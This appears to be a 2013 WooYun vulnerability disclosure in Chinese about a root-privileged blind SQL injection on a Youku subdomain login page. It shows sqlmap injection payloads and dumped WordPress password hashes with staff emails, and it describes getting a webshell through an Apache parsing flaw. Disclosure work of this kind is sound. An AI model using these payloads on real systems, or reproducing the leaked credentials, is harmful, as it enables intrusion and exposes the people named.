当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032916

漏洞标题:优酷网root权限盲注漏洞导致数十个分站与数据库沦陷

相关厂商:优酷

漏洞作者: 数据流

提交时间:2013-07-31 11:35

修复时间:2013-09-14 11:36

公开时间:2013-09-14 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-31: 细节已通知厂商并且等待厂商处理中
2013-07-31: 厂商已经确认,细节仅向厂商公开
2013-08-10: 细节向核心白帽子及相关领域专家公开
2013-08-20: 细节向普通白帽子公开
2013-08-30: 细节向实习白帽子公开
2013-09-14: 细节向公众公开

简要描述:

自上个月连续提交3个20rank的sohu都没提交了 最近又看到一群人在刷struts2我都不忍心看wooyun被刷屏....无奈

详细说明:

1,通过google找到分站http://minisite.youku.com/
随手试了试admin manage login 等找到admin1 的后台登陆地址
2,http://minisite.youku.com/admin1/login.php

y1.png


登陆框中username参数加单引号' 出现异常

y2.png


而输入两个单引号就正常了''

y3.png


出现这样的情况就怀疑有注射了
开sqlmap跑了下 果然存在注射 

Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: username=asd' RLIKE IF(5146=5146,0x617364,0x28) AND 'OwBw'='OwBw
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: username=asd'; SELECT SLEEP(5)-- 
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
current user:    'root@%'
sqlmap identified the following


root权限 里面有77个库
3, 找到一个wordpress
http://minisite.youku.com/blog/
通过以上注射点 注射blog库 

user_pass,user_login,user_email,user_activation_key
$P$B0mSwAo6Md/Xc72veM7xPbz1CGNdjx1,Editor,Editor@youku.com,<blank>
$P$B3/owR5KcpAZ4TSBKB.z/CY.ZbQi2u0,qiqima,qiqima@youku.com,<blank>
$P$B7LWNj2CAEk1xUuR7bKvQnbdXzwaZC/,admin,zhangpo@youku.com,zwjIDkDyJxAPw0gFMYlY
$P$Bg.5Y/4sI7wSvYFIjJUGWFWg8TXRMf0,luluma,luluma@youku.com,<blank>
12061103,youku,youku@youku.com,<blank>


其中Editor为弱密码

y4.png


成功登陆后台

y6.png


4,服务器存在apache解析漏洞
通过上传图片获取webshell

y7.png

漏洞证明:

由于权限配置问题在于导致服务器上几十个站点沦陷

y8.png


修复方案:

版权声明:转载请注明来源 数据流@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-07-31 11:44

厂商回复:

修复中

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-31 11:36 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    果然是“数据流”

  2. 2013-07-31 11:40 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    @疯狗 求雷劈 哈哈

  3. 2013-07-31 11:40 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @数据流 (#‵′)凸

  4. 2013-07-31 11:48 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    @优酷 速度好快啊

  5. 2013-07-31 12:47 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    这个库应该被爆了多次了把。。

  6. 2013-07-31 12:58 | lsh4ck ( 实习白帽子 | Rank:81 漏洞数:14 | 不是黑客!但是黑客手段都要会?)

    数据牛

  7. 2013-07-31 14:54 | 1ee ( 普通白帽子 | Rank:105 漏洞数:14 | 看书中....)

    - - 我是来凑热闹的

  8. 2013-07-31 15:37 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @数据流 你威武啊 哈。